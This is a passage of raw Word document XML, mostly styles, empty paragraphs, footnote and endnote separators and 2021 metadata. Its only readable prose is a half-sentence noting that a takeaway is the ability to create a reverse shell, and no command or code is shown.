        </w:rPr>
        <w:t xml:space="preserve">The second takeaway is the ability to create a reverse shell using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r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5F860187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CD3413" w14:textId="77777777" w:rsidR="00DF04A0" w:rsidRPr="005E319B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8BD08D" w14:textId="4E8D3E3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B979001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75A4CFC" w14:textId="2E480E8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D62269D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CE35A4" w14:textId="7BECAEF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002FA3" w14:textId="77777777" w:rsidR="005E319B" w:rsidRPr="00660EC9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74AA788" w14:textId="77777777" w:rsidR="00660EC9" w:rsidRPr="00B74C4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D54310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3FD549E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73F9F71" w14:textId="1ED4853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07A702" w14:textId="77777777" w:rsidR="00C05D2A" w:rsidRP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D853209" w14:textId="29DD6E7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2EE4AEEB" w14:textId="77777777" w:rsidR="00C05D2A" w:rsidRP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BD4F9CF" w14:textId="44806A38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D77AF07" w14:textId="7777777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16D2A25F" w14:textId="6EF68920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2F78B70" w14:textId="77777777" w:rsidR="0064567D" w:rsidRP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F0E610A" w14:textId="77777777" w:rsidR="0064567D" w:rsidRDefault="0064567D" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43BFADFB" w14:textId="77777777" w:rsidR="0053670E" w:rsidRPr="0053670E" w:rsidRDefault="0053670E" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB07C05" w14:textId="77777777" w:rsidR="0053670E" w:rsidRPr="00C20D8D" w:rsidRDefault="0053670E" w:rsidP="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="052AF0A3" w14:textId="77777777" w:rsidR="00C20D8D" w:rsidRPr="006C48C6" w:rsidRDefault="00C20D8D">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00C20D8D" w:rsidRPr="006C48C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FFAE1" w14:textId="77777777" w:rsidR="00581D35" w:rsidRDefault="00581D35" w:rsidP="00897CF3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7091413A" w14:textId="77777777" w:rsidR="00581D35" w:rsidRDefault="00581D35" w:rsidP="00897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97A0" w14:textId="77777777" w:rsidR="00897CF3" w:rsidRDefault="00897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88042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CCEDA" w14:textId="4983D138" w:rsidR="00897CF3" w:rsidRDefault="00897C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23B57A" w14:textId="77777777" w:rsidR="00897CF3" w:rsidRDefault="00897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4FA8" w14:textId="77777777" w:rsidR="00897CF3" w:rsidRDefault="00897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DDA9" w14:textId="77777777" w:rsidR="00581D35" w:rsidRDefault="00581D35" w:rsidP="00897CF3">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2B91206D" w14:textId="77777777" w:rsidR="00581D35" w:rsidRDefault="00581D35" w:rsidP="00897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7F6F5" w14:textId="77777777" w:rsidR="00897CF3" w:rsidRDefault="00897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928EF" w14:textId="77777777" w:rsidR="00897CF3" w:rsidRDefault="00897C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2FA" w14:textId="77777777" w:rsidR="00897CF3" w:rsidRDefault="00897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15B33"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E848A1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zUyNzE1NjUzMTdV0lEKTi0uzszPAykwqQUAAMOs+iwAAAA="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="006C48C6"/>
    <w:rsid w:val="00264966"/>
    <w:rsid w:val="00351BBE"/>
    <w:rsid w:val="00381993"/>
    <w:rsid w:val="003E6B99"/>
    <w:rsid w:val="00451E04"/>
    <w:rsid w:val="004E5E8C"/>
    <w:rsid w:val="0053670E"/>
    <w:rsid w:val="00581D35"/>
    <w:rsid w:val="005A7239"/>
    <w:rsid w:val="005E319B"/>
    <w:rsid w:val="00611531"/>
    <w:rsid w:val="0064567D"/>
    <w:rsid w:val="00660EC9"/>
    <w:rsid w:val="006B527C"/>
    <w:rsid w:val="006C48C6"/>
    <w:rsid w:val="006D477E"/>
    <w:rsid w:val="006F0A69"/>
    <w:rsid w:val="007552B7"/>
    <w:rsid w:val="007F694F"/>
    <w:rsid w:val="00854EB6"/>
    <w:rsid w:val="00897CF3"/>
    <w:rsid w:val="00A66F1D"/>
    <w:rsid w:val="00B74C49"/>
    <w:rsid w:val="00BD0185"/>
    <w:rsid w:val="00C05D2A"/>
    <w:rsid w:val="00C20D8D"/>
    <w:rsid w:val="00C27C82"/>
    <w:rsid w:val="00D57039"/>
    <w:rsid w:val="00DF04A0"/>
    <w:rsid w:val="00E91C6B"/>
    <w:rsid w:val="00FE5E8B"/>
    <w:rsid w:val="00FF3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FDDC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{01E22078-4F6C-46F3-B820-88E62D2F1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8D"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-text">
    <w:name w:val="enlighter-text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0064567D"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-c0">
    <w:name w:val="enlighter-c0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="0064567D"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="006456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67D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-n0">
    <w:name w:val="enlighter-n0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00B74C49"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-s0">
    <w:name w:val="enlighter-s0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00660EC9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Head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C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C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3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4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23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1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23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3T06:41:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-13T06:42:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-12-14T00:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>